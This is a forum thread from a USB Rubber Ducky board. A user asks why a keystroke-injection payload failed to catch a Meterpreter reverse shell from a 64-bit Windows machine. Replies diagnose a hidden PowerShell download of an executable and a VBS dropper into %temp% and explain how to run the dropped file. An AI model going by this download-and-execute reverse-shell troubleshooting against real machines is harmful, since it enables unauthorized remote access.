Jump to content

Escalating Privileges in Windows & Staged Reverse Shells [DID NOT WORK HELP]

nik321

By nik321,
in USB Rubber Ducky

 Share Followers 0

Recommended Posts

nik321

nik321

Posted
Posted

So I literally just finished copying this tutorial ...

https://www.youtube.com/watch?v=fmRRX7-G4lc

And everything went smoothly... Apart from when I plugged in the duck... Nothing happened on my Kali MSF... No shells were caught?

I should first off mention that my target machine was actually a 64 bit windows, so i had to change the msfvenom -a to x64 and change the payload to windows/x64/meterpreter/reverse_tcp...

But besides that everything went ok... So because the shell wasnt being caught, I decided to open up powershell my self, and manually type in the code that the ducky inject.bin is trying to run in powershell.... and i got this error...

So I think the reason nothing happens when I plug the duck in, is because in the background (because obviously it is commanded to be hidden in the inject.bin) this is happening... making MSF not catch a shell...

 

Please could anyone take a look at this and help me overcome this error please. I would be forever grateful! Thank you hak5 enthusiasts! <3

Link to post
Share on other sites
nik321

nik321

Posted
  • Author
Posted
3 minutes ago, Lord_KamOS said:

x86 should works just fine on x64

 

Oh really? So I can still go ahead and make the payload for a 32 bit computer (like in the video) and still run it on a 64 bit machine? ok that is interesting. Thank you. I do know about 32 bit being cross compatible with 64, but not the other way around. 

But besides that. Is there a reason that the ducky script, once opened up in powershell, is not actually pulling my payload (website.com/bob.exe) or my vbs file (website.com/ggg.txt - As made in the video) from my website?

(You also commented on my other help thread for the turtle. Thank you for being active and trying to help me with my endeavors.)

Link to post
Share on other sites
Lord_KamOS

Lord_KamOS

Posted
Posted
56 minutes ago, nik321 said:

But besides that. Is there a reason that the ducky script, once opened up in powershell, is not actually pulling my payload (website.com/bob.exe) or my vbs file (website.com/ggg.txt - As made in the video) from my website?

I am not sure, and sadly i cant test it right now, but maybe you can look into the twinduck firmware. I find it more effective just mounting sd card and run the payload from the duck itself.

 

Link to post
Share on other sites
nik321

nik321

Posted
  • Author
Posted
11 minutes ago, Lord_KamOS said:

I am not sure, and sadly i cant test it right now, but maybe you can look into the twinduck firmware. I find it more effective just mounting sd card and run the payload from the duck itself.

 

This is something that also interested me! I would prefer to be able to host the payload on the pendrive as well as the inject.bin > I like the idea of it all being contained in its self. I will take a look a the twinduck firmware setup on YouTube. Thank you for this.

Link to post
Share on other sites
nik321

nik321

Posted
  • Author
Posted

Ok so I did a bit of googling, and it turns out the powershell commands in the inject.bin are not real commands.. Is this because there might of been an update since the make of that video rendering those commands useless now?

Link to post
Share on other sites
nik321

nik321

Posted
  • Author
Posted
2 hours ago, ThoughtfulDev said:

The download command is right. the '%temp%/update.vbs is wrong.

You want to run update.vbs right? 

try somehting like cd %temp%; ./update.vbs

Note the './'

I don't think its supposed to run it, rather save it as that name, rather than ggg.txt (as shown in image)

Link to post
Share on other sites
ThoughtfulDev

ThoughtfulDev

Posted
Posted
19 hours ago, nik321 said:

I don't think its supposed to run it, rather save it as that name, rather than ggg.txt (as shown in image)

I know the DownloadFile command runs just fine (remove everything after the ;). The file should then be in your temp folder (named update.vbs).

The error is the line after the ';'.

This line tries to run the update.vbs located in the temp folder but if you want to run a.exe in powershell you cant just type a.exe you have to use ./a.exe (you understand my point?)

Link to post
Share on other sites
nik321

nik321

Posted
  • Author
Posted
22 hours ago, ThoughtfulDev said:

I know the DownloadFile command runs just fine (remove everything after the ;). The file should then be in your temp folder (named update.vbs).

The error is the line after the ';'.

This line tries to run the update.vbs located in the temp folder but if you want to run a.exe in powershell you cant just type a.exe you have to use ./a.exe (you understand my point?)

Aaaagh!! Thank you so much friend! I am going to try this out! Your help has been amazing and I thank you for trying to help me overcome this. Big thanks to you mate!

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Followers 0
Go to topic listing

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...